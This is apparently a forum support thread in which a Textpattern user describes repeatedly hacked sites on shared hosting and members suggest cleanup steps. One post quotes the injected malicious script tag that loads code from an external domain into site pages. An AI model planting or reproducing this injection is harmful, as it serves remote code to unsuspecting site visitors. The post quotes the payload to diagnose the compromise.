Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2012-03-06 05:37:59

fowler
Member
Registered: 2007-02-12
Posts: 79

Issues with sites getting hacked.

A few of my sites have been hacked recently. PHP files are modified with offending code and new files are added to my server. I’m trying to figure out if this is a Textpattern issue or something with my host. I’m not really sure where to look first.

Any pointers would be great. I’d consider myself a novice when it comes to this sort of thing, so take it slow ;)

Offline

#2 2012-03-06 08:35:47

milosevic
Member
From: Madrid, Spain
Registered: 2005-09-19
Posts: 390

Re: Issues with sites getting hacked.

Fortunatetly for you, textpattern stores the programation of pages onto database tables so, if you haven’t done any strange thing (like editing .htaccess), you can delete all textpattern files and folders and upload a fresh set of textpattern files. (remember to save your config.php file to stablish the connection between textpattern and the database and the images and/or files uploadeds like content).

Any way, before deleting, make a backup on your computer.

If the database hasen’t been hacked, the site will be clean.

Last edited by milosevic (2012-03-06 08:36:09)


<txp:rocks/>

Offline

#3 2012-03-06 08:58:38

Dragondz
Moderator
From: Algérie
Registered: 2005-06-12
Posts: 1,538
Website GitHub Twitter

Re: Issues with sites getting hacked.

Hi

if some files has been added can you say where that had be done and also wich version of textpattern you use?

Offline

#4 2012-03-06 12:37:44

wet
Developer Emeritus
From: Schoerfling, Austria
Registered: 2005-06-06
Posts: 3,330
Website Mastodon

Re: Issues with sites getting hacked.

Please post the output of the Textpattern diagnostics tab

Offline

#5 2012-03-06 17:04:50

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,091
Website GitHub Mastodon Twitter

Re: Issues with sites getting hacked.

I would change all my passwords including ftp and mysql


Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

Offline

#6 2012-03-07 01:58:36

tye
Member
From: Pottsville, NSW
Registered: 2005-07-06
Posts: 859
Website

Re: Issues with sites getting hacked.

If you are on shared hosting, I’d also check with you host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.

Offline

#7 2012-03-07 03:11:10

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

“If you are on shared hosting, I’d also check with you host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.”

It is in fact shared hosting. It’s happened multiple times on the same host, so that could most likely be it.

I’m switching to Media Temple VS.. anyone have any luck with them?

I would post a diagnostic dump, but I recently went through and updated everything in a panic. So far so good, but I figure it’s not going to last for long.

Installs have varied from 4.2 to 4.4.1.

Offline

#8 2012-03-07 03:14:46

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

Actually, just came across this:

- – - – - – -
Textpattern version: 4.4.1 (r3575)
Last Update: 2012-01-06 18:15:27/2012-02-22 03:18:35
Document root: /home/wag_redbull/faultline.redbullprojects.com
$path_to_site: /home/wag_redbull/faultline.redbullprojects.com
Textpattern path: /home/wag_redbull/faultline.redbullprojects.com/textpattern
Permanent link mode: section_id_title
Temporary directory path: /home/wag_redbull/faultline.redbullprojects.com/textpattern/tmp
Site URL: www.faultline.redbullprojects.com
PHP version: 5.2.17
GD Image Library: version bundled (2.0.34 compatible), supported formats: GIF, JPG, PNG
Server TZ: America/Los_Angeles
Server Local Time: 2012-03-06 19:20:08
DST enabled?: 0
Automatically adjust DST setting?: 0
Time Zone: America/Yakutat (-32400)
MySQL: 5.1.53-log
Locale: en_US.UTF-8
Server: Apache
PHP Server API: cgi-fcgi
RFC 2616 headers: 0
Server OS: Linux 2.6.32.45-grsec-2.2.2-r3
Active plugins: rss_auto_excerpt-0.5, lam_image_uploader-0.6c
Admin-side theme: classic 4.4.1

Pre-flight check:
————————————
/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists
Some Textpattern files have been modified: /home/wag_redbull/faultline.redbullprojects.com/index.php, /home/wag_redbull/faultline.redbullprojects.com/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_b2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_blogger.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mt.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mtdb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_wp.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_article.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_auth.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_category.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_diag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_discuss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_file.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_form.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_image.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_import.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_link.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_list.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_log.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_page.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_plugin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_prefs.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_section.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_tag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/index.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/IXRClass.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/admin_config.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/class.thumb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/classTextile.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/constants.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/taglib.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_db.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_forms.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_head.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_html.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_misc.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_theme.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_update.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_wrapper.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/atom.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/comment.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/log.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/rss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/search.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/taghandlers.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/theme/classic/classic.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_1.0.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.3.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.4.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.5.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.6.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.7.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.8.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.2.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.3.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.4.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_update.php
————————————

.htaccess file contents:
————————————
#DirectoryIndex index.php index.html

#Options +FollowSymLinks
#Options -Indexes
#ErrorDocument 403 default

<IfModule mod_rewrite.c> RewriteEngine On #RewriteBase /relative/web/path/

RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^(.+) – [PT,L]

RewriteCond %{REQUEST_URI} !=/favicon.ico RewriteRule ^(.*) index.php

RewriteCond %{HTTP:Authorization} !^$ RewriteRule .* – [E=REMOTE_USER:%{HTTP:Authorization}]
</IfModule>

#php_value register_globals 0

————————————

Offline

#9 2012-03-07 03:43:28

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 595
Website

Re: Issues with sites getting hacked.

Can you post the contents of index.php?

Offline

#10 2012-03-07 04:07:43

tye
Member
From: Pottsville, NSW
Registered: 2005-07-06
Posts: 859
Website

Re: Issues with sites getting hacked.

and remove the /setup/ folder

/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists

Offline

#11 2012-03-07 05:16:27

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

Setup folder has been removed.

This is the script that it’s injecting:

<script src="http://laprot98ocolle.rr.nu/mm.php?d=1"></script>

I’m also finding this stuff in Wordpress installs on the same server.

Last edited by fowler (2012-03-07 05:17:06)

Offline

#12 2012-03-07 05:36:35

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 595
Website

Re: Issues with sites getting hacked.

I’m also finding this stuff in Wordpress installs on the same server.

So have you ruled out an exploited Wordpress vulnerability?

Offline

Board footer

Powered by FluxBB